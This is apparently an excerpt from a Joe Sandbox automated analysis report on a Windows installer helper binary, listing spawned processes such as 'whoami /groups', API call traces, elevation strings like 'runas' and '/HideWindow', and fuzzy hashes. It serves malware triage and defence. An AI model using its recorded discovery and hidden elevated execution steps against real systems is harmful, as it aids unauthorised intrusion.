MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	12:41:34
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	12:41:34
Start date:	02/12/2024
Path:	C:\Windows\System32\whoami.exe
Wow64 process (32bit):	false
Commandline:	whoami /groups
Imagebase:	0x7ff6df810000
File size:	73'728 bytes
MD5 hash:	A4A6924F3EAF97981323703D38FD99C4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	38.3%
Total number of Nodes:	389
Total number of Limit Nodes:	10

Executed Functions

Function 00C14BA0 Relevance: 36.5, APIs: 24, Instructions: 502
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C157C0: GetCurrentProcess.KERNEL32(00000008,?,0EAD22C0,?,-00000010), ref: 00C157D0
Part of subcall function 00C157C0: OpenProcessToken.ADVAPI32(00000000), ref: 00C157D7

CoInitialize.OLE32(00000000), ref: 00C14C15
CoCreateInstance.OLE32(00C572B0,00000000,00000004,00C65104,00000000,?), ref: 00C14C45
CoUninitialize.COMBASE ref: 00C15187
_com_issue_error.COMSUPP ref: 00C151B5

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
String ID:
API String ID: 928366108-0
Opcode ID: 11b67647d535065782201b51a57cb5594e99e9defd312f4c4e502066a0f6d717
Instruction ID: 85da6e2c8db6e06d0227deca8569fb486426e60dbcd3a88ab5f3886fd0ca15e4
Opcode Fuzzy Hash: 11b67647d535065782201b51a57cb5594e99e9defd312f4c4e502066a0f6d717
Instruction Fuzzy Hash: EA229F70E04388EFEF11CFA8C948BDDBBB4AF56304F248199E409EB281D7759A85DB51

Function 00C16A50 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 461
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00C16AC8
OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00C16AD5
CloseHandle.KERNEL32(00000000), ref: 00C16AF5

Strings

S-1-5-18, xrefs: 00C16B69

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpenToken
String ID: S-1-5-18
API String ID: 4052875653-4289277601
Opcode ID: 3f0311fc9733fcbee8a582c55306186d74e41317fa2025b7f372ff9fcbf1927e
Instruction ID: dfec082bc50b91c6393e5a1e0c26ef6c2ac1c82ea5a77c1d640f52c4d7ffce78
Opcode Fuzzy Hash: 3f0311fc9733fcbee8a582c55306186d74e41317fa2025b7f372ff9fcbf1927e
Instruction Fuzzy Hash: CF02E674900219CFDF14DFA4C9547EEFBB5EF46304F148298E812AB281EB349E85EB90

Function 00C157C0 Relevance: 6.0, APIs: 4, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000008,?,0EAD22C0,?,-00000010), ref: 00C157D0
OpenProcessToken.ADVAPI32(00000000), ref: 00C157D7
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00C1580C
CloseHandle.KERNEL32(?), ref: 00C15822

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: 1adc2cf4f96cde41e968ebdfe9b4f4f59aa1284f5a0978d5b77ae2af91901f0d
Instruction ID: 6ea629f1687415e36aea89447c90ec752abef5c9e7155aa77864433f520f7b43
Opcode Fuzzy Hash: 1adc2cf4f96cde41e968ebdfe9b4f4f59aa1284f5a0978d5b77ae2af91901f0d
Instruction Fuzzy Hash: 9DF04F74148301AFE7109F10EC49B9A7BE8BB84701F408819F990D21A0D378869CDA62

Function 00C1CDB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32(0EAD22C0,?,?,?,?,?,?,?,?,?,00C556D5,000000FF), ref: 00C1CDE8

Part of subcall function 00C11F80: LocalAlloc.KERNEL32(00000040,00000000,?,?,vector too long,00C14251,0EAD22C0,00000000,?,00000000,?,?,?,00C54400,000000FF,?), ref: 00C11F9D

ExitProcess.KERNEL32 ref: 00C1CEB1

Part of subcall function 00C16600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00C1667E

Strings

Full command line:, xrefs: 00C1CE13

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: AllocCommandCreateExitFileLineLocalProcess
String ID: Full command line:
API String ID: 1878577176-831861440
Opcode ID: 276788b2244a2f08b29a7242d33cc96058062c9af09f99461c7e2fc291912319
Instruction ID: a2204e4c2ac9db410f28b4e7c8ae4c420f4f9b2a3591b0e2fc93bbf67bb49406
Opcode Fuzzy Hash: 276788b2244a2f08b29a7242d33cc96058062c9af09f99461c7e2fc291912319
Instruction Fuzzy Hash: 7E210271910214ABCB14FB60DC96BEE77A5AF42740F144118F802AB2D2EF345B89F791

Function 00C15E40 Relevance: 4.6, APIs: 3, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00C15E18,0EAD22C0,?), ref: 00C15EB4
GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00C15E18,0EAD22C0,?), ref: 00C15EBE
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00C15E18,0EAD22C0,?), ref: 00C15F1A

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: InformationToken$ErrorLast
String ID:
API String ID: 2567405617-0
Opcode ID: 5fb9a8d5e23c3f4e0e8fb119dd08e949ecb6bb3d93bbad40dd5c65761b59d4fb
Instruction ID: 358357918205e6577259cd10535342a6efa7d1afc7932a81e9930bed012a1247
Opcode Fuzzy Hash: 5fb9a8d5e23c3f4e0e8fb119dd08e949ecb6bb3d93bbad40dd5c65761b59d4fb
Instruction Fuzzy Hash: C2318F71A00605EFD724CF99DC45BAFBBF9FB85710F10452EE415A7280D7B5A9848B90

Function 00C470BB Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,00C4596A,00000001,00000364,?,00000006,000000FF,?,00C36CE7,00000000,00C43841,00000000), ref: 00C470FC

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f3ddd2cbd49a8b8581f892d9c4485727ed9c7b2a74744d61559fde4a6d4ffbe7
Instruction ID: 0c8b361f23a75d27f93e5a3c6faffc3d96338e14c1c7c35b118058c12e189a66
Opcode Fuzzy Hash: f3ddd2cbd49a8b8581f892d9c4485727ed9c7b2a74744d61559fde4a6d4ffbe7
Instruction Fuzzy Hash: 04F0E23120E6246BAB325A269D05B5F775DBF517B1B144322FC28AA590CBA0ED01A6E1

Non-executed Functions

Function 00C152F0 Relevance: 52.9, APIs: 14, Strings: 16, Instructions: 402
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 00C1549C
GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 00C1551D
ShellExecuteExW.SHELL32(?), ref: 00C15601
ShellExecuteExW.SHELL32(?), ref: 00C15637
GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00C1567C
GetProcAddress.KERNEL32(00000000), ref: 00C15685
AllowSetForegroundWindow.USER32(00000000), ref: 00C1568B
GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00C156AB
GetProcAddress.KERNEL32(00000000), ref: 00C156AE
Sleep.KERNEL32(00000064,?,?,?,?,?,?), ref: 00C156CA
EnumWindows.USER32(00C15830,?), ref: 00C156DF
BringWindowToTop.USER32(00000000), ref: 00C156F4
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 00C15711
GetExitCodeProcess.KERNEL32(?,?), ref: 00C1571B

Strings

Directory:<, xrefs: 00C155B2
GetProcessId, xrefs: 00C15672, 00C156A1
%s\System32\cmd.exe, xrefs: 00C154A9
open, xrefs: 00C154D5
Kernel32.dll, xrefs: 00C15677, 00C156A6
Visible, xrefs: 00C155DB, 00C155EA
Parameters:<, xrefs: 00C155C6
Window Visibility:, xrefs: 00C155E3
runas, xrefs: 00C154EC
FilePath:<, xrefs: 00C15589
Verb:<, xrefs: 00C1559E
Hidden, xrefs: 00C155D6
ShellExecuteInfo members:, xrefs: 00C15540
/C ""%s" %s", xrefs: 00C154C1
.cmd, xrefs: 00C1545F
.bat, xrefs: 00C15422

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Window$AddressExecuteForegroundHandleModuleProcShellWindows$AllowBringCodeDirectoryEnumExitObjectProcessSingleSleepWait
String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
API String ID: 697762045-2796270252
Opcode ID: 7bd34bbdae534550ede2bc92214ccbf3cf7f886aa76121a27e2af6d4c9b9b312
Instruction ID: a5157ed662c9d0e5417b4dcbb6ba2cd6906149b122c35d65ee91c4c5dcc4369e
Opcode Fuzzy Hash: 7bd34bbdae534550ede2bc92214ccbf3cf7f886aa76121a27e2af6d4c9b9b312
Instruction Fuzzy Hash: AAE1C275E00A09DBCF20DFA8C884BEEB7B5EF86710F644169E815AB391D7349D81DB90

Function 00C1C870 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 366registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00C1CBB6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00C6E6D0,00000800), ref: 00C1CBD3

Strings

/DIR , xrefs: 00C1C9F3
/RunAsAdmin , xrefs: 00C1C92B, 00C1C94C, 00C1C951
/DontWait , xrefs: 00C1C8D8, 00C1C8EE, 00C1C8F3
/HideWindow, xrefs: 00C1C98E, 00C1C9AC, 00C1C9B1
/LogFile, xrefs: 00C1CA07
/EnforcedRunAsAdmin , xrefs: 00C1C893, 00C1C8A3, 00C1C8A8

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: OpenQueryValue
String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
API String ID: 4153817207-482544602
Opcode ID: 6c2088f80bd180eae2fd871b2dfdf17efe225829f5e63af6d9326ad819efb3ca
Instruction ID: e466e51f5b14fc3fb5e39e14a77090708aa0b43f35b35aa7f602022c835c80b6
Opcode Fuzzy Hash: 6c2088f80bd180eae2fd871b2dfdf17efe225829f5e63af6d9326ad819efb3ca
Instruction Fuzzy Hash: 3CC1D5756842168BCB359F14C4D13FA73A1EF92740F58445AF8AADB290E770CEC2E791

Function 00C13860 Relevance: 10.7, APIs: 7, Instructions: 227processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0EAD22C0,?), ref: 00C138CB
CloseHandle.KERNEL32(00000000), ref: 00C1390B
Process32FirstW.KERNEL32(?,00000000), ref: 00C1395F
OpenProcess.KERNEL32(00000410,00000000,?), ref: 00C1397A
CloseHandle.KERNEL32(00000000), ref: 00C13A8E
Process32NextW.KERNEL32(?,00000000), ref: 00C13AA2
CloseHandle.KERNEL32(?), ref: 00C13AF0

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 708755948-0
Opcode ID: f9b8a458365b373fdb6685f326adb5c3189e1cd870f3fe0a86e3f323b92195a2
Instruction ID: d692486b658639b8cfd87b51aaf7751f4f48f3fa2aad0cf9b8c952bc04e23a85
Opcode Fuzzy Hash: f9b8a458365b373fdb6685f326adb5c3189e1cd870f3fe0a86e3f323b92195a2
Instruction Fuzzy Hash: 44A11AB5901249EFDF10CFA9D988BDEBBF8BF49304F148159E815AB280D7745B84DBA0

Function 00C4F032 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00C4F216

Strings

1#QNAN, xrefs: 00C4F145
1#SNAN, xrefs: 00C4F13E
1#IND, xrefs: 00C4F137
1#INF, xrefs: 00C4F168

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: d1fd231f6482cd02285cc3bc2075cda0e794c2b6f7eeadbb0f5ecd31c2bdcaab
Instruction ID: 99a0be1dbbd0f4da6db0400bda01389ea49e60af8de7a876e2f0d3cc82556d1d
Opcode Fuzzy Hash: d1fd231f6482cd02285cc3bc2075cda0e794c2b6f7eeadbb0f5ecd31c2bdcaab
Instruction Fuzzy Hash: FFD22972E082298FDB65CE28DD407EAB7B5FB44305F1441EAD85DE7240E778AE868F41

Function 00C4E5B3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00C4E8D1,00000002,00000000,?,?,?,00C4E8D1,?,00000000), ref: 00C4E64C
GetLocaleInfoW.KERNEL32(?,20001004,00C4E8D1,00000002,00000000,?,?,?,00C4E8D1,?,00000000), ref: 00C4E675
GetACP.KERNEL32(?,?,00C4E8D1,?,00000000), ref: 00C4E68A

Strings

ACP, xrefs: 00C4E5D1
OCP, xrefs: 00C4E607

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: ae39831a46bc19e02bbba5511edac38306c1687059d97de9dd1ef45631d13e3a
Instruction ID: f9064b498fadddaf41b6c30b95aaf79a863fc8a3418d9f35b29eb1fc255cc4e2
Opcode Fuzzy Hash: ae39831a46bc19e02bbba5511edac38306c1687059d97de9dd1ef45631d13e3a
Instruction Fuzzy Hash: 8621AC72A00208AADB34CF25C901BEB73A6BF64B64F578464F91AD7110FB32DE80C350

Function 00C19CC0 Relevance: 7.9, APIs: 5, Instructions: 441COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00C19E60
LocalFree.KERNEL32(00000000), ref: 00C19EB7
_swprintf.LIBCMT ref: 00C1A0A0
LocalFree.KERNEL32(00000000), ref: 00C1A0F7
_swprintf.LIBCMT ref: 00C1A183

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: _swprintf$FreeLocal
String ID:
API String ID: 2429749586-0
Opcode ID: 41433bda79ca6492ccc35be779c137b2e610997a6c21d6b7283e13029d2c48a5
Instruction ID: 31f6cb23a841f04af56091987beb2d111a0817804e895ddb21bbee30cc7f2ca4
Opcode Fuzzy Hash: 41433bda79ca6492ccc35be779c137b2e610997a6c21d6b7283e13029d2c48a5
Instruction Fuzzy Hash: 34F1AB71E10219ABDF18DFA8DC50BEEBBB5FF4A300F144229F811A7280D735A981DB91

Function 00C4E788 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C457CC: GetLastError.KERNEL32(?,00000008,00C4AD4C), ref: 00C457D0
Part of subcall function 00C457CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00C45872

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00C4E894
IsValidCodePage.KERNEL32(00000000), ref: 00C4E8DD
IsValidLocale.KERNEL32(?,00000001), ref: 00C4E8EC
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00C4E934
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00C4E953

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: e8d166313c1502b3177714fb77fc91cc0840b8a89a61c5ff7d4bde5168318b20
Instruction ID: 3d5ccd55f23247987787f7cfa8388e900eaf7d8e96919d611a443a5a75eaa476
Opcode Fuzzy Hash: e8d166313c1502b3177714fb77fc91cc0840b8a89a61c5ff7d4bde5168318b20
Instruction Fuzzy Hash: B2518D71A00319AFEF20EFA9DC45BBE77B8BF48701F164469E910E7191EB709A40DB60

Function 00C45D6D Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00C45DFA

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
Instruction ID: a54c67dd5af1a28d03239889a01ed7753ab5707a5daa7dc4a278768f30946721
Opcode Fuzzy Hash: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
Instruction Fuzzy Hash: F7B17A72D046459FEB15CF68C881BFEBBA5FF59300F14816AE815AB342D235DE05CBA2

Function 00C4B02D Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00C4B0C8
FindNextFileW.KERNEL32(00000000,?), ref: 00C4B143
FindClose.KERNEL32(00000000), ref: 00C4B165
FindClose.KERNEL32(00000000), ref: 00C4B188

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: bab2423c5ae7410c17f69025e07eb5318851e0a1b37924d823ead88252423a69
Instruction ID: ea3115f04a1ac33b7d5651f69a0a23bd9fb0a64e82594cdf6c263f0e0de55897
Opcode Fuzzy Hash: bab2423c5ae7410c17f69025e07eb5318851e0a1b37924d823ead88252423a69
Instruction Fuzzy Hash: C1419271900619AADB20DFA8DC99AAFB7B8FF85305F144195E419A7180E730DE848B60

Function 00C333A8 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C333B4
IsDebuggerPresent.KERNEL32 ref: 00C33480
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C334A0
UnhandledExceptionFilter.KERNEL32(?), ref: 00C334AA

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: d5547068a6cb641c2507cedafc680f446cda6943e37c348d91ab7b51a08ccb8f
Instruction ID: 06c66d5d60353c7e89e1bd52f81391320445fe7b3dfcece1769e2e97ba2176a8
Opcode Fuzzy Hash: d5547068a6cb641c2507cedafc680f446cda6943e37c348d91ab7b51a08ccb8f
Instruction Fuzzy Hash: BD314575D153189BDB21EFA0D989BCDBBB8AF08304F1041AAE50CAB250EB759B859F44

